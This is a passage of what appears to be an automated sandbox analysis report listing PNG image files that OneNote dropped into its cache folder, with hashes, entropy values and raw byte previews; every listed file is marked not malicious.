Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
